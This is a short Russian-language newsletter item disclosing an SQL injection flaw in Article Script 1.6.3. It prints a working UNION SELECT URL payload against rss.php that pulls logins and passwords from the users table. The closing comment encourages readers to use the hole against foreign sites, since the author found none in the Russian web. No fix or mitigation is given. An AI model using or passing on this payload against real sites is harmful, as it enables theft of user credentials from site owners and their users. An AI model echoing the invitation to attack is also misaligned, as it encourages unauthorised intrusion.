Компьютер для продвинутых пользоватлей Выпус по безопасности. SQL-уязвимость в Article Script.
Компьютер для продвинутых
пользователей
В этом выпуске:
Article Script
ПО: Article Script
Версия: 1.6.3
Уязвимость:
Функция category не проверяет переменные до выполнения, что позволяет на
провести SQL-инъекцию и получить данный по пользователям. Использование: http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/* Комментарий:
Поискал данный скрипт в Рунете, но страниц с ним не нашёл. Видимо тем,
кто хочет использовать эту, уязвимость придётся трясти буржуев.